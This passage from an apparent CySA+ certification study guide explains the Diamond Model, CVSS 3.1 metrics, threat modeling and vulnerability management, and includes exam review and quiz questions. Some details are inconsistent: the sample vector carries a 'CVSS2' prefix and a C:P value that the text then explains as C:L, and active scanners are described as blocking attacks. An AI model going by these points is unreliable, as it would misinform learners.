Figure 2-1 shows a depiction of the Diamond Model.
Figure 2-1 Diamond Model
The corners of the Diamond Model are defined as
follows:
• Adversary: The intent of the attack
• Capability: Attacker intrusion tools and
techniques
• Infrastructure: The set of systems an attacker
uses to launch attacks
• Victim: A single victim or multiple victims
To access the Diamond Model document see
https://www.activeresponse.org/wpcontent/uploads/2013/07/diamond.pdf.
Kill Chain
The cyber kill chain is a cyber intrusion identification
and prevention model developed by Lockheed Martin
that describes the stages of an intrusion. It includes
seven steps, as described in Figure 2-2. For more
information, see https://www.lockheedmartin.com/enus/capabilities/cyber/cyber-kill-chain.html.
Figure 2-2 Kill Chain
THREAT RESEARCH
As a security professional, sometimes just keeping up
with your day-to-day workload can be exhausting. But
performing ongoing research as part of your regular
duties is more important in today’s world than ever
before. You should work with your organization and
direct supervisor to ensure that you either obtain formal
security training on a regular basis or are given adequate
time to maintain and increase your security knowledge.
You should research the current best security practices,
any new security technologies that are coming to market,
any new security systems and services that have
launched, and how security technology has evolved
recently.
Threat intelligence is a process that is used to inform
decisions regarding responses to any menace or hazard
presented by the latest attack vectors and actors
emerging on the security horizon. Threat intelligence
analyzes evidence-based knowledge, including context,
mechanisms, indicators, implications, and actionable
advice, about an existing or emerging menace or hazard
to assets.
Performing threat intelligence requires generating a
certain amount of raw material for the process. This
information includes data on the latest attacks,
knowledge of current vulnerabilities and threats,
specifications on the latest zero-day mitigation controls
and remediation techniques, and descriptions of the
latest threat models. Let’s look at some issues important
to threat research.
Reputational
Some threat intelligence data is generated from past
activities. Reputational scores may be generated for
traffic sourced from certain IP ranges, domain names,
and URLs. An example of a system that uses such
reputational scores is the Cisco Talos IP and Domain
Reputation Center. Customers who are participants in
the system enjoy the access to data from all customers.
As malicious traffic is received by customers,
reputational scores are developed for IP ranges, domain
names, and URLs that serve as sources of the traffic.
Based on these scores, traffic may be blocked from those
sources on the customer networks.
Behavioral
Some threat intelligence data is based not on reputation
but on the behavior of the traffic in question. For
example, when the source in question is repeatedly
sending large amounts of traffic to a single IP address, it
indicates a potential DoS attack.
Behavioral analysis is also known as anomaly analysis,
because it also observes network behaviors for
anomalies. It can be implemented using combinations of
the scanning types, including NetFlow, protocol, and
packet analyses, to create a baseline and subsequently
report departures from the traffic metrics found in the
baseline. One of the newer advances in this field is the
development of user and entity behavior analytics
(UEBA). This type of analysis focuses on user activities.
Combining behavior analysis with machine learning,
UEBA enhances the ability to determine which particular
users are behaving oddly. An example would be a hacker
who has stolen credentials of a user and is identified by
the system because he is not performing the same
activities that the user would perform.
Heuristics is a method used in malware detection,
behavioral analysis, incident detection, and other
scenarios in which patterns must be detected in the
midst of what might appear to be chaos. It is a process
that ranks alternatives using search algorithms, and
although it is not an exact science and is somewhat a
form of “guessing,” it has been shown in many cases to
approximate an exact solution. Heuristics also includes a
process of self-learning through trial and error as it
arrives at the final approximated solution. Many IPS,
IDS and anti-malware systems that include heuristics
capabilities can often detect so-called zero-day issues
using this technique.
Indicator of Compromise (IoC)
An indicator of compromise (IoC) is any activity,
artifact, or log entry that is typically associated with an
attack of some sort. Typical examples include the
following:
• Virus signatures
• Known malicious file types
• Domain names of known botnet servers
Known IoCs are exchanged within the security industry,
using the Traffic Light Protocol (TLP) to classify the
IoCs. TLP is a set of designations used to ensure that
sensitive information is shared with the appropriate
audience. Somewhat analogous to a traffic light, it
employs four colors to indicate expected sharing
boundaries to be applied by the recipient.
Common Vulnerability Scoring
System (CVSS)
The Common Vulnerability Scoring System
(CVSS) version 3.1 is a system of ranking vulnerabilities
that are discovered based on predefined metrics. This
system ensures that the most critical vulnerabilities can
be easily identified and addressed after a vulnerability
test is met. Most commercial vulnerability management
tools use CVSS scores as a baseline. Scores are awarded
on a scale of 0 to 10, with the values having the following
ranks:
Note
The Forum of Incident Response and Security Teams (FIRST) is the custodian
of CVSS 3.1.
• 0: No issues
• 0.1 to 3.9: Low
• 4.0 to 6.9: Medium
• 7.0 to 8.9: High
• 9.0 to 10.0: Critical
CVSS is composed of three metric groups:
• Base: Characteristics of a vulnerability that are
constant over time and user environments
• Temporal: Characteristics of a vulnerability that
change over time but not among user
environments
• Environmental: Characteristics of a
vulnerability that are relevant and unique to a
particular user’s environment
The Base metric group includes the following metrics:
• Attack Vector (AV): Describes how the attacker
would exploit the vulnerability and has four
possible values:
• L: Stands for Local and means that the attacker
must have physical or logical access to the
affected system
• A: Stands for Adjacent network and means that
the attacker must be on the local network
• N: Stands for Network and means that the
attacker can cause the vulnerability from any
network
• P: Stands for Physical and requires the attacker
to physically touch or manipulate the
vulnerable component
• Attack Complexity (AC): Describes the
difficulty of exploiting the vulnerability and has
three possible values:
• H: Stands for High and means that the
vulnerability requires special conditions that
are hard to find
• L: Stands for Low and means that the
vulnerability does not require special
conditions
• Privileges Required (Pr): Describes the
authentication an attacker would need to get
through to exploit the vulnerability and has three
possible values:
• H: Stands for High and means the attacker
requires privileges that provide significant
(e.g., administrative) control over the
vulnerable component allowing access to
component-wide settings and files
• L: Stands for Low and means the attacker
requires privileges that provide basic user
capabilities that could normally affect only
settings and files owned by a user
• N: Stands for None and means that no
authentication mechanisms are in place to stop
the exploit of the vulnerability
• User Interaction (UI): Captures the
requirement for a human user, other than the
attacker, to participate in the successful
compromise of the vulnerable component.
• N: Stands for None and means the vulnerable
system can be exploited without interaction
from any user
• R: Stands for required and means successful
exploitation of this vulnerability requires a user
to take some action before the vulnerability can
be exploited
• Scope (S): Captures whether a vulnerability in
one vulnerable component impacts resources in
components beyond its security scope.
• U: Stands for Unchanged and means the
exploited vulnerability can only affect
resources managed by the same security
authority
• C: Stands for Changed and means that the
exploited vulnerability can affect resources
beyond the security scope managed by the
security authority of the vulnerable component
The Impact metric group includes the following metrics:
• Availability (A): Describes the disruption that
might occur if the vulnerability is exploited and
has three possible values:
• N: Stands for None and means that there is no
availability impact
• L: Stands for Low and means that system
performance is degraded
• H: Stands for High and means that the system
is completely shut down
• Confidentiality (C): Describes the information
disclosure that may occur if the vulnerability is
exploited and has three possible values:
• N: Stands for None and means that there is no
confidentiality impact
• L: Stands for Low and means some access to
information would occur
• H: Stands for High and means all information
on the system could be compromised
• Integrity (I): Describes the type of data
alteration that might occur and has three possible
values:
• N: Stands for None and means that there is no
integrity impact
• L: Stands for Low and means some
information modification would occur
• H: Stands for High and means all information
on the system could be compromised
The CVSS vector looks something like this:
CVSS2#AV:L/AC:H/Pr:L/UI:R/S:U/ C:P/I:N/A:N
This vector is read as follows:
• AV:L: Access vector, where L stands for Local and
means that the attacker must have physical or
logical access to the affected system
• AC:H: Attack complexity, where H stands for
stands for High and means that the vulnerability
requires special conditions that are hard to find
• Pr:L: Privileges Required, where L stands for Low
and means the attacker requires privileges that
provide basic user capabilities that could normally
affect only settings and files owned by a user
• UI:R: User Interaction, where R stands for
required and means successful exploitation of this
vulnerability requires a user to take some action
before the vulnerability can be exploited
• S:U: Scope, where U stands for Unchanged and
means the exploited vulnerability can only affect
resources managed by the same security authority
• C:L: Confidentiality, where L stands for Low and
means that some access to information would
occur
• I:N: Integrity, where N stands for None and
means that there is no integrity impact
• A:N: Availability, where N stands for None and
means that there is no availability impact
For more information, see
https://www.first.org/cvss/v3-1/cvss-v31specification_r1.pdf.
Note
For access to CVVS calculators, see the following resources:
• CVSS Scoring System Calculator: https://nvd.nist.gov/vulnmetrics/cvss/v3-calculator?calculator&adv&version=2
• CVSS Version 3.1 Calculator: https://www.first.org/cvss/calculator/3.1
THREAT MODELING
METHODOLOGIES
An organization should have a well-defined risk
management process in place that includes the
evaluation of risk that is present. When this process is
carried out properly, a threat modeling
methodology allows organizations to identify threats
and potential attacks and implement the appropriate
mitigations against these threats and attacks. These
facets ensure that security controls that are implemented
are in balance with the operations of the organization.
There are a number of factors to consider in a threat
modeling methodology that will be covered in the
following section.
Adversary Capability
First, you must have a grasp of the capabilities of the
attacker. Threat actors have widely varying capabilities.
When carrying out threat modeling, you may decide to
develop a more comprehensive list of threat actors to
help in scenario development.
Security professionals should analyze all the threats to
identify all the actors who pose significant threats to the
organization. Examples of the threat actors include both
internal and external actors and include the following:
• Internal actors:
• Reckless employee
• Untrained employee
• Partner
• Disgruntled employee
• Internal spy
• Government spy
• Vendor
• Thief
• External actors:
• Anarchist
• Competitor
• Corrupt government official
• Data miner
• Government cyber warrior
• Irrational individual
• Legal adversary
• Mobster
• Activist
• Terrorist
• Vandal
These actors can be subdivided into two categories: nonhostile and hostile. In the preceding lists, three actors are
usually considered non-hostile: reckless employee,
untrained employee, and partner. All the other actors
should be considered hostile.
The organization would then need to analyze each of
these threat actors according to set criteria. All threat
actors should be given a ranking to help determine which
threat actors need to be analyzed. Examples of some of
the most commonly used criteria include the following:
• Skill level: None, minimal, operational, adept
• Resources: Individual, team, organization,
government
• Limits: Code of conduct, legal, extra-legal
(minor), extra-legal (major)
• Visibility: Overt, covert, clandestine, don’t care
• Objective: Copy, destroy, injure, take, don’t care
• Outcome: Acquisition/theft, business advantage,
damage, embarrassment, technical advantage
With these criteria, the organization must then
determine which of the actors it wants to analyze. For
example, the organization may choose to analyze all
hostile actors that have a skill level of adept, resources of
an organization or government, and limits of extra-legal
(minor) or extra-legal (major). Then the list is
consolidated to include only the threat actors that fit all
of these criteria.
Total Attack Surface
The total attack surface comprises all the points at
which vulnerabilities exist. It is critical that the
organization have a clear understanding of the total
attack surface. Otherwise, it is somewhat like locking all
the doors of which one is aware while several doors exist
of which one is not aware. The result is unlocked doors.
Identifying the attack surface should be a formalized
process that arrives at a complete list of vulnerabilities.
Only then can each vulnerability be addressed properly
with security controls, processes, and procedures.
To identify the potential attacks that could occur, an
organization must create scenarios so that each potential
attack can be fully analyzed. For example, an
organization may decide to analyze a situation in which a
hacktivist group performs prolonged denial-of-service
attacks, causing sustained outages intended to damage
the organization’s reputation. The organization then
must make a risk determination for each scenario.
Once all the scenarios are determined, the organization
develops an attack tree for each potential attack. Such an
attack tree includes all the steps and/or conditions that
must occur for the attack to be successful. The
organization then maps security controls to the attack
trees.
To determine the security controls that can be used, the
organization would need to look at industry standards,
including NIST SP 800-53 (revision 4 at the time of
writing). Finally, the organization would map controls
back into the attack tree to ensure that controls are
implemented at as many levels of the attack surface as
possible.
Note
For
more
information
on
NIST
SP
800-53,
see
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf.
Attack Vector
An attack vector is the path or means with which the
attack is carried out. Some examples of attack vectors
include the following:
• Phishing
• Malware
• Exploit unpatched vulnerabilities
• Code injection
• Social engineering
• Advanced persistent threats (APTs)
Once attack vectors and attack agents have been
identified, the organization must assess the relative
impact and likelihood of such attacks. This allows the
organization to prioritize the limited resources available
to address the vulnerabilities.
Impact
Once all assets have been identified and their value to the
organization has been established, the organization must
identify impact to each asset. An attempt must be made
to establish the impact to the organization should that
occur. While both quantitative and qualitative risk
assessments may be performed, when a qualitative
assessment is conducted, the risks are placed into the
following categories:
• High
• Medium
• Low
Typically a risk assessment matrix is created, such as the
one shown in Figure 2-3. Subject matter experts grade all
risks on their likelihood and their impact. This helps to
prioritize the application of resources to the most critical
vulnerabilities.
Figure 2-3 Risk Assessment Matrix
Once the organization determines what it really cares
about protecting, the organization should then select the
scenarios that could have a catastrophic impact on the
organization by using the objective and outcome values
from the adversary capability analysis and the asset value
and business impact information from the impact
analysis.
Probability
When performing the assessment mentioned in the
previous section, the organization must also consider the
probability that each security event occurs; note in
Figure 2-3 that one axis of the risk matrix is impact and
the other is probability.
THREAT INTELLIGENCE
SHARING WITH SUPPORTED
FUNCTIONS
Earlier we looked at the importance of sharing
intelligence information with other organizations. It is
also critical that such information be shared with all
departments that perform various security functions.
Although an organization might not have a separate
group for each of the areas covered in the sections that
follow, security professionals should ensure that the
latest threat data is made available to all functional units
that participate in these activities.
Incident Response
Incident response will be covered more completely in
Chapter 15, “The Incident Response Process,” but here it
is important to point out that properly responding to
security incidents requires knowledge of what may be
occurring, and that requires a knowledge of the very
latest threats and how those threats are realized.
Therefore, members who are trained in the incident
response process should also be kept up to date on the
latest threat vectors by giving them access to all threat
intelligence that has been collected through any
sharing arrangements.
Vulnerability Management
Vulnerability management will be covered in
Chapter 5, “Vulnerabilities Associated with Specialized
Technology,” and Chapter 6, “Threats and Vulnerabilities
Associated with Operating in the Cloud,” but here it is
important to point out that there is no function that
depends so heavily on shared intelligence information as
vulnerability management. When sharing platforms and
protocols are used to identify new threats, this data must
be shared in a timely manner with those managing
vulnerabilities.
Risk Management
Risk management will be addressed in Chapter 20,
“Applying Security Concepts in Support of
Organizational Risk Mitigation.” It is a formal process
that rates identified vulnerabilities by the likelihood of
their compromise and the impact of said compromise.
Because this process is based on complete and thorough
vulnerability identification, speedy sharing of any new
threat intelligence is critical to the vulnerability
management process on which risk management
depends.
Security Engineering
Security engineering is the process of architecting
security features into the design of a system or set of
systems. It has as its goal an emphasis on security from
the ground up, sometimes stated as “building in
security.” Unless the very latest threats are shared with
this function, engineers cannot be expected to build in
features that prevent threats from being realized.
Detection and Monitoring
Finally, those who are responsible for monitoring and
detecting attacks also benefit greatly from timely sharing
of threat intelligence data. Without this, indicators of
compromise cannot be developed and utilized to identify
the new threats in time to stop them from causing
breaches.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 2-3 lists a reference of these key topics and the
page number on which each is found.
Table 2-3 Key Topics in Chapter 2
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
attack frameworks
MITRE ATT&CK
Diamond Model of Intrusion Analysis
adversary
capability
infrastructure
victim
kill chain
heuristics
indicator of compromise (IoC)
Common Vulnerability Scoring System (CVSS)
Attack Vector (AV)
Attack Complexity (AC)
Privileges Required (Pr)
Availability (A)
Confidentiality (C)
Integrity (I)
risk management
threat modeling methodology
total attack surface
incident response
threat intelligence
vulnerability management
security engineering
REVIEW QUESTIONS
1. Match each corner of the Diamond Model with its
description.
2. The _______________ corner of the Diamond
Model focuses on the intent of the attack.
3. What type of threat data describes a source that
repeatedly sends large amounts of traffic to a single
IP address?
4. _________________ is any activity, artifact, or
log entry that is typically associated with an attack
of some sort.
5. Give at least two examples of an IoC.
6. Match each acronym with its description
7. In the following CVSS vector, what does the Pr:L
designate?
CVSS2#AV:L/AC:H/Pr:L/UI:R/S:U/ C:P/I:N/A:N
8. The _________________CVSS metric group
describes characteristics of a vulnerability that are
constant over time and user environments.
9. The ____________ CVSS base metric describes
how the attacker would exploit the vulnerability.
10. Match each CVSS attack vector value with its
description.
Chapter 3. Vulnerability
Management Activities
This chapter covers the following topics related
to Objective 1.3 (Given a scenario, perform
vulnerability management activities) of the
CompTIA Cybersecurity Analyst (CySA+) CS0002 certification exam:
• Vulnerability identification: Explores asset
criticality, active vs. passive scanning, and
mapping/enumeration
• Validation: Covers true positive, false positive,
true negative, and false negative alerts
• Remediation/mitigation: Describes
configuration baseline, patching, hardening,
compensating controls, risk acceptance, and
verification of mitigation
• Scanning parameters and criteria: Explains
risks associated with scanning activities,
vulnerability feed, scope, credentialed vs. noncredentialed scans, server-based vs. agent-based
scans, internal vs. external scans, and special
considerations including types of data, technical
constraints, workflow, sensitivity levels,
regulatory requirements, segmentation, intrusion
prevention system (IPS), intrusion detection
system (IDS), and firewall settings
• Inhibitors to remediation: Covers
memorandum of understanding (MOU), servicelevel agreement (SLA), organizational governance,
business process interruption, degrading
functionality, legacy systems, and proprietary
systems
Managing vulnerabilities requires more than a casual
approach. There are certain processes and activities that
should occur to ensure that your management of
vulnerabilities is as robust as it can be. This chapter
describes the activities that should be performed to
manage vulnerabilities.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these five self-assessment
questions, you might want to move ahead to the “Exam
Preparation Tasks” section. Table 3-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so you that can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 3-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following helps to identify the number
and type of resources that should be devoted to a
security issue?
a. Specific threats that are applicable to the
component
b. Mitigation strategies that could be used
c. The relative value of the information that could
be discovered
d. The organizational culture
2. Which of the following occurs when the scanner
correctly identifies a vulnerability?
a. True positive
b. False positive
c. False negative
d. True negative
3. Which of the following is the first step of the patch
management process?
a. Determine the priority of the patches
b. Install the patches
c. Test the patches
d. Ensure that the patches work properly
4. Which of the following is not a risk associated with
scanning activities?
a. False sense of security can be introduced
b. Does not itself reduce your risk
c. Only as valid as the latest scanner update
d. Distracts from day-to-day operations
5. Which of the following is a document that, while
not legally binding, indicates a general agreement
between the principals to do something together?
a. SLA
b. MOU
c. ICA
d. SCA
FOUNDATION TOPICS
VULNERABILITY
IDENTIFICATION
Vulnerabilities must be identified before they can be
mitigated by applying security controls or
countermeasures. Vulnerability identification is typically
done through a formal process called a vulnerability
assessment, which works hand in hand with another
process called risk management. The vulnerability
assessment identifies and assesses the vulnerabilities,
and the risk management process goes a step further and
identifies the assets at risk and assigns a risk value
(derived from both the impact and likelihood) to each
asset.
Regardless of the components under study (network,
application, database, etc.), any vulnerability
assessment’s goal is to highlight issues before someone
either purposefully or inadvertently leverages the issue
to compromise the component. The design of the
assessment process has a great impact on its success.
Before an assessment process is developed, the following
goals of the assessment need to be identified:
• The relative value of the information that
could be discovered through the
compromise of the components under
assessment: This helps to identify the number
and type of resources that should be devoted to
the issue.
• The specific threats that are applicable to
the component: For example, a web application
would not be exposed to the same issues as a
firewall because their operation and positions in
the network differ.
• The mitigation strategies that could be
deployed to address issues that might be
found: Identifying common strategies can
suggest issues that weren’t anticipated initially.
For example, if you were doing a vulnerability test
of your standard network operating system image,
you should anticipate issues you might find and
identify what technique you will use to address
each.
A security analyst who will be performing a vulnerability
assessment needs to understand the systems and devices
that are on the network and the jobs they perform.
Having this knowledge will ensure that the analyst can
assess the vulnerabilities of the systems and devices
based on the known and potential threats to the systems
and devices.
After gaining knowledge regarding the systems and
device, a security analyst should examine existing
controls in place and identify any threats against those
controls. The security analyst then uses all the
information gathered to determine which automated
tools to use to analyze for vulnerabilities. After the
vulnerability analysis is complete, the security analyst
should verify the results to ensure that they are accurate
and then report the findings to management, with
suggestions for remedial action. With this information in
hand, the threat analyst should carry out threat modeling
to identify the threats that could negatively affect
systems and devices and the attack methods that could
be used.
In some situations, a vulnerability management system
may be indicated. A vulnerability management system is
software that centralizes and, to a certain extent,
automates the process of continually monitoring and
testing the network for vulnerabilities. Such a system can
scan the network for vulnerabilities, report them, and, in
many cases, remediate the problem without human
intervention. While a vulnerability management system
is a valuable tool to have, these systems, regardless of
how sophisticated they may be, cannot take the place of
vulnerability and penetration testing performed by
trained professionals.
Keep in mind that after a vulnerability assessment is
complete, its findings are only a snapshot in time. Even if
no vulnerabilities are found, the best statement to
describe the situation is “there are no known
vulnerabilities at this time.” It is impossible to say with
certainty that a vulnerability will not be discovered in the
near future.
Asset Criticality
Assets should be classified based on their value to the
organization and their sensitivity to disclosure. Assigning
a value to data and assets enables an organization to
determine the resources that should be used to protect
them. Resources that are used to protect data include
personnel resources, monetary resources, access control
resources, and so on. Classifying assets enables you to
apply different protective measures. Asset classification
is critical to all systems to protect the confidentiality,
integrity, and availability (CIA) of the asset. After assets
are classified, they can be segmented based on the level
of protection needed. The classification levels ensure that
assets are protected in the most cost-effective manner
possible. The assets could then be configured to ensure
they are isolated or protected based on these
classification levels. An organization should determine
the classification levels it uses based on the needs of the
organization. A number of private-sector classifications
and military and government information classifications
are commonly used.
The information life cycle should also be based on the
classification of the assets. In the case of data assets,
organizations are required to retain certain information,
particularly financial data, based on local, state, or
government laws and regulations.
Sensitivity is a measure of how freely data can be
handled. Data sensitivity is one factor in determining
asset criticality. For example , a particular server
stores highly sensitive data and therefore needs to be
identified as a high criticality asset. Some data requires
special care and handling, especially when inappropriate
handling could result in penalties, identity theft,
financial loss, invasion of privacy, or unauthorized access
by an individual or many individuals. Some data is also
subject to regulation by state or federal laws that require
notification in the event of a disclosure. Data is assigned
a level of sensitivity based on who should have access to
it and how much harm would be done if it were
disclosed. This assignment of sensitivity is called data
classification. Criticality is a measure of the importance
of the data. Data that is considered sensitive might not
necessarily be considered critical. Assigning a level of
criticality to a particular data set requires considering the
answers to a few questions:
• Will you be able to recover the data in case of
disaster?
• How long will it take to recover the data?
• What is the effect of this downtime, including loss
of public standing?
Data is considered essential when it is critical to the
organization’s business. When essential data is not
available, even for a brief period of time, or when its
integrity is questionable, the organization is unable to
function. Data is considered required when it is
important to the organization but organizational
operations would continue for a predetermined period of
time even if the data were not available. Data is
nonessential if the organization can operate without it
during extended periods of time.
Active vs. Passive Scanning
Network vulnerability scans probe a targeted system or
network to identify vulnerabilities. The tools used in this
type of scan contain a database of known vulnerabilities
and identify whether a specific vulnerability exists on
each device. There are two types of vulnerability
scanning:
• Passive vulnerability scanning: Passive
vulnerability scanning collects information but
doesn’t take any action to block an attack. A
passive vulnerability scanner (PVS) monitors
network traffic at the packet layer to determine
topology, services, and vulnerabilities. It avoids
the instability that can be introduced to a system
by actively scanning for vulnerabilities. PVS tools
analyze the packet stream and look for
vulnerabilities through direct analysis. They are
deployed in much the same way as intrusion
detection systems (IDSs) or packet analyzers. A
PVS can pick a network session that targets a
protected server and monitor it as much as
needed. The biggest benefit of a PVS is its
capability to do its work without impacting the
monitored network. Some examples of PVSs are
the Nessus Network Monitor (formerly Tenable
PVS) and NetScanTools Pro.
• Active vulnerability scanning: Active
vulnerability scanning collects information and
attempts to block the attack. Whereas passive
scanners can only gather information, active
vulnerability scanners (AVSs) can take action to
block an attack, such as block a dangerous IP
address. AVSs can also be used to simulate an
attack to assess readiness. They operate by
sending transmissions to nodes and examining
the responses. Because of this, these scanners may
disrupt network traffic. Examples include Nessus
Professional and OpenVAS.
Regardless of whether it’s active or passive, a
vulnerability scanner cannot replace the expertise of
trained security personnel. Moreover, these scanners are
only as effective as the signature databases on which they
depend, so the databases must be updated regularly.
Finally, because scanners require bandwidth, they
potentially slow the network. For best performance, you
can place a vulnerability scanner in a subnet that needs
to be protected. You can also connect a scanner through
a firewall to multiple subnets; this complicates the
configuration and requires opening ports on the firewall,
which could be problematic and could impact the
performance of the firewall.
Mapping/Enumeration
Vulnerability mapping and enumeration is the process
of identifying and listing vulnerabilities. In Chapter 2,
“Utilizing Threat Intelligence to Support Organizational
Security,” you were introduced to the Common
Vulnerability Scoring System (CVSS). A closely related
concept is the Common Weakness Enumeration (CWE),
a category system for software weaknesses and
vulnerabilities. CWE organizes vulnerabilities into over
600 categories, including classes for buffer overflows,
path/directory tree traversal errors, race conditions,
cross-site scripting, hard-coded passwords, and insecure
random numbers. CWE is only one of a number of
enumerations that are used by Security Content
Automation Protocol (SCAP), a standard that the
security community uses to enumerate software flaws
and configuration issues. SCAP will be covered more
fully in Chapter 14, “Automation Concepts and
Technologies.”
VALIDATION
Scanning results are not always correct. Scanning tools
can make mistakes identifying vulnerabilities. There are
four types of results a scanner can deliver:
• True positive: Occurs when the scanner
correctly identifies a vulnerability. True means the
scanner is correct and positive means it identified
a vulnerability.
• False positive: Occurs when the scanner
identifies a vulnerability that does not exist. False
mean the scanner is incorrect and positive means
it identified a vulnerability. Lots of false positives
reduces confidence in scanning results.
• True negative: Occurs when the scanner
correctly determines that a vulnerability does not
exist. True means the scanner is correct and
negative means it did not identify a vulnerability.
• False negative: Occurs when the scanner does
not identity a vulnerability that actually exists.
False means the scanner is wrong and negative
means it did not find a vulnerability. This is worse
than a false positive because it means that a
vulnerability exists that you are unaware of.
REMEDIATION/MITIGATION
When vulnerabilities are identified, security
professionals must take steps to address them. One of
the outputs of a good risk management process is the
prioritization of the vulnerabilities and an assessment of
the impact and likelihood of each. Driven by those
results, security measures (also called controls or
countermeasures) can be put in place to reduce risk.
Let’s look at some issues relevant to vulnerability
mitigation.
Configuration Baseline
A baseline is a floor or minimum standard that is
required. With respect to configuration baselines,
they are security settings that are required on devices of
various types. These settings should be driven by results
of vulnerability and risk management processes.
One practice that can make maintaining security simpler
is to create and deploy standard images that have been
secured with security baselines. A security baseline is a
set of configuration settings that provide a floor of
minimum security in the image being deployed.
Security baselines can be controlled through the use of
Group Policy in Windows. These policy settings can be
made in the image and applied to both users and
computers. These settings are refreshed periodically
through a connection to a domain controller and cannot
be altered by the user. It is also quite common for the
deployment image to include all of the most current
operating system updates and patches as well. This
creates consistency across devices and helps prevent
security issues caused by human error in configuration.
When a network makes use of these types of
technologies, the administrators have created a standard
operating environment. The advantages of such an
environment are more consistent behavior of the
network and simpler support issues. Scans should be
performed of the systems weekly to detect changes to the
baseline.
Security professionals should help guide their
organization through the process of establishing the
security baselines. If an organization implements very
strict baselines, it will provide a higher level of security
but can actually be too restrictive.
If an organization implements a very lax baseline, it will
provide a lower level of security and will likely result in
security breaches. Security professionals should
understand the balance between protecting the
organizational assets and allowing users access and
should work to ensure that both ends of this spectrum
are understood.
Patching
Patch management, or patching, is often seen as a subset
of configuration management. Software patches are
updates released by vendors that either fix functional
issues with or close security loopholes in operating
systems, applications, and versions of firmware that run
on network devices.
To ensure that all devices have the latest patches
installed, you should deploy a formal system to ensure
that all systems receive the latest updates after thorough
testing in a non-production environment. It is impossible
for a vendor to anticipate every possible impact a change
might have on business-critical systems in a network.
The enterprise is responsible for ensuring that patches
do not adversely impact operations.
The patch management life cycle includes the following
steps:
Step 1. Determine the priority of the patches and
schedule the patches for deployment.
Step 2. Test the patches prior to deployment to
ensure that they work properly and do not
cause system or security issues.
Step 3. Install the patches in the live environment.
Step 4. After the patches are deployed, ensure that
they work properly.
Many organizations deploy a centralized patch
management system to ensure that patching is
deployed in a timely manner. With this system,
administrators can test and review all patches before
deploying them to the systems they affect.
Administrators can schedule the updates to occur during
non-peak hours.
Hardening
Another of the ongoing goals of operations security is to
ensure that all systems have been hardened to the extent
that is possible and still provide functionality. The
hardening can be accomplished both on physical and
logical bases. From a logical perspective:
• Remove unnecessary applications.
• Disable unnecessary services.
• Block unrequired ports.
• Tightly control the connecting of external storage
devices and media (if it’s allowed at all).
Compensating Controls
Not all vulnerabilities can be eliminated. In some cases,
they can only be mitigated. This can be done by
implementing compensating controls (also known as
countermeasures or safeguards) that compensate for a
vulnerability that cannot be completely eliminated by
reducing the potential risk of that vulnerability being
exploited. Three things must be considered when
implementing a compensating control: vulnerability,
threat, and risk. For example, a good compensating
control might be to implement the appropriate access
control list (ACL) and encrypt the data. The ACL protects
the integrity of the data, and the encryption protects the
confidentiality of the data.
Note
For
more
information
on
compensating
controls,
http://pcidsscompliance.net/overview/what-are-compensating-controls/.
see
Risk Acceptance
You learned about risk management in Chapter 2. Part of
the risk management process is deciding how to address
a vulnerability. There are several ways to react. Risk
reduction is the process of altering elements of the
organization in response to risk analysis. After an
organization understands its risk, it must determine how
to handle the risk. The following four basic methods are
used to handle risk:
• Risk avoidance: Terminating the activity that
causes a risk or choosing an alternative that is not
as risky
• Risk transfer: Passing on the risk to a third
party, such as an insurance company
• Risk mitigation: Defining the acceptable risk
level the organization can tolerate and reducing
the risk to that level
• Risk acceptance: Understanding and accepting
the level of risk as well as the cost of damages that
can occur
Verification of Mitigation
Once a threat has been remediated, you should verify
that the mitigation has solved the issue. You should also
take steps to ensure that all is back to its normal secure
state. These steps validate that you are finished and can
move on to taking corrective actions with respect to the
lessons learned.
• Patching: In many cases, a threat or an attack is
made possible by missing security patches. You
should update or at least check for updates for a
variety of components. This includes all patches
for the operating system, updates for any
applications that are running, and updates to all
anti-malware software that is installed. While you
are at it, check for any firmware update the device
may require. This is especially true of hardware
security devices such as firewalls, IDSs, and IPSs.
If any routers or switches are compromised, check
for software and firmware updates.
• Permissions: Many times an attacker
compromises a device by altering the permissions,
either in the local database or in entries related to
the device in the directory service server. All
permissions should undergo a review to ensure
that all are in the appropriate state. The
appropriate state might not be the state they were
in before the event. Sometimes you may discover
that although permissions were not set in a
dangerous way prior to an event, they are not
correct. Make sure to check the configuration
database to ensure that settings match prescribed
settings. You should also make changes to the
permissions based on lessons learned during an
event. In that case, ensure that the new settings
undergo a change control review and that any
approved changes are reflected in the
configuration database.
• Scanning: Even after you have taken all steps
described thus far, consider using a vulnerability
scanner to scan the devices or the network of
devices that were affected. Make sure before you
do so that you have updated the scanner so it can
recognize the latest vulnerabilities and threats.
This will help catch any lingering vulnerabilities
that might still be present.
• Verify logging/communication to security
monitoring: To ensure that you will have good
security data going forward, you need to ensure
that all logs related to security are collecting data.
Pay special attention to the manner in which the
logs react when full. With some settings, the log
begins to overwrite older entries with new entries.
With other settings, the service stops collecting
events when the log is full. Security log entries
need to be preserved. This may require manual
archiving of the logs and subsequent clearing of
the logs. Some logs make this possible
automatically, whereas others require a script. If
all else fails, check the log often to assess its state.
Many organizations send all security logs to a
central location. This could be a Syslog server, or
it could be a security information and event
management (SIEM) system. These systems not
only collect all the logs but also use the
information to make inferences about possible
attacks. Having access to all logs enables the
system to correlate all the data from all
responding devices. Regardless of whether you are
logging to a Syslog server or a SIEM system, you
should verify that all communications between the
devices and the central server are occurring
without a hitch. This is especially true if you had
to rebuild the system manually rather than restore
from an image, as there would be more
opportunity for human error in the rebuilding of
the device.
SCANNING PARAMETERS
AND CRITERIA
Scanning is the process of using scanning tools to
identity security issues. Typical issues discovered include
missing patches, weak passwords, and insecure
configurations. While types of scanning are covered in
Chapter 4, “Analyzing Assessment Output,” let’s look at
some issues and considerations supporting the process.
Risks Associated with Scanning
Activities
While vulnerability scanning is an advisable and valid
